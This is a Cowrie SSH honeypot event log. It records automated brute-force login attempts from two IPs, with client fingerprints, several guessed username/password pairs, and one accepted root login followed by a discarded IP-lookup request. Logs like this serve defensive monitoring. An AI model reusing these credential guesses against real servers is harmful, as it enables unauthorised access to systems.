{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44492,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8ab9ed76cd7","protocol":"ssh","message":"New connection: 212.227.235.229:44492 (1.2.3.4:22) [session: b8ab9ed76cd7]","sensor":"my-vps","timestamp":"2025-08-31T04:47:52.483386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:47:52.506746Z","src_ip":"212.227.235.229","session":"b8ab9ed76cd7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:47:52.567789Z","src_ip":"212.227.125.160","session":"ab8fb88af178"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:47:52.768164Z","src_ip":"212.227.235.229","session":"b8ab9ed76cd7"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:53.138491Z","src_ip":"212.227.125.160","session":"ab8fb88af178"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:54.330472Z","src_ip":"212.227.125.160","session":"ab8fb88af178"}
{"eventid":"cowrie.session.closed","duration":"40.4","message":"Connection lost after 40.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:54.697469Z","src_ip":"212.227.235.229","session":"51330a7869a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44504,"dst_ip":"1.2.3.4","dst_port":22,"session":"e914534d4a5b","protocol":"ssh","message":"New connection: 212.227.235.229:44504 (1.2.3.4:22) [session: e914534d4a5b]","sensor":"my-vps","timestamp":"2025-08-31T04:47:54.795184Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"abc123","message":"login attempt [admin/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:54.830331Z","src_ip":"212.227.235.229","session":"b8ab9ed76cd7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:47:54.846866Z","src_ip":"212.227.235.229","session":"e914534d4a5b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:47:55.078185Z","src_ip":"212.227.235.229","session":"e914534d4a5b"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:56.715117Z","src_ip":"212.227.235.229","session":"b8ab9ed76cd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59110,"dst_ip":"1.2.3.4","dst_port":22,"session":"12b5bbeaa4e9","protocol":"ssh","message":"New connection: 212.227.235.229:59110 (1.2.3.4:22) [session: 12b5bbeaa4e9]","sensor":"my-vps","timestamp":"2025-08-31T04:47:57.223095Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48832,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d03ad67ed80","protocol":"ssh","message":"New connection: 212.227.235.229:48832 (1.2.3.4:22) [session: 4d03ad67ed80]","sensor":"my-vps","timestamp":"2025-08-31T04:47:57.313643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:47:57.395372Z","src_ip":"212.227.235.229","session":"4d03ad67ed80"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:47:57.579219Z","src_ip":"212.227.235.229","session":"4d03ad67ed80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45802,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9a445cfa8f9","protocol":"ssh","message":"New connection: 212.227.125.160:45802 (1.2.3.4:22) [session: a9a445cfa8f9]","sensor":"my-vps","timestamp":"2025-08-31T04:47:57.715862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:47:57.717564Z","src_ip":"212.227.125.160","session":"a9a445cfa8f9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:47:57.899397Z","src_ip":"212.227.125.160","session":"a9a445cfa8f9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:47:57.913680Z","src_ip":"212.227.235.229","session":"12b5bbeaa4e9"}
{"eventid":"cowrie.login.failed","username":"bin","password":"bin","message":"login attempt [bin/bin] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:57.915689Z","src_ip":"212.227.235.229","session":"e914534d4a5b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:47:57.948405Z","src_ip":"212.227.235.229","session":"12b5bbeaa4e9"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:58.446573Z","src_ip":"212.227.125.160","session":"a9a445cfa8f9"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:59.193557Z","src_ip":"212.227.235.229","session":"e914534d4a5b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:59.630522Z","src_ip":"212.227.125.160","session":"a9a445cfa8f9"}
{"eventid":"cowrie.login.success","username":"root","password":"welc0me","message":"login attempt [root/welc0me] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:48:00.444204Z","src_ip":"212.227.235.229","session":"4d03ad67ed80"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:48:00.798886Z","session":"4d03ad67ed80"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:48:01.066261Z","src_ip":"212.227.235.229","session":"4d03ad67ed80"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:01.336551Z","src_ip":"212.227.235.229","session":"4d03ad67ed80"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"P@ssw0rd123","message":"login attempt [postgres/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:04.077585Z","src_ip":"212.227.235.229","session":"12b5bbeaa4e9"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:05.869201Z","src_ip":"212.227.235.229","session":"12b5bbeaa4e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60938,"dst_ip":"1.2.3.4","dst_port":22,"session":"08878f209347","protocol":"ssh","message":"New connection: 212.227.235.229:60938 (1.2.3.4:22) [session: 08878f209347]","sensor":"my-vps","timestamp":"2025-08-31T04:48:09.847936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:48:09.899544Z","src_ip":"212.227.235.229","session":"08878f209347"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34712,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5c39f7b9774","protocol":"ssh","message":"New connection: 212.227.235.229:34712 (1.2.3.4:22) [session: c5c39f7b9774]","sensor":"my-vps","timestamp":"2025-08-31T04:48:10.476708Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:48:11.271954Z","src_ip":"212.227.235.229","session":"08878f209347"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35014,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0dcf011bbb9","protocol":"ssh","message":"New connection: 212.227.125.160:35014 (1.2.3.4:22) [session: a0dcf011bbb9]","sensor":"my-vps","timestamp":"2025-08-31T04:48:13.484610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:48:13.485511Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
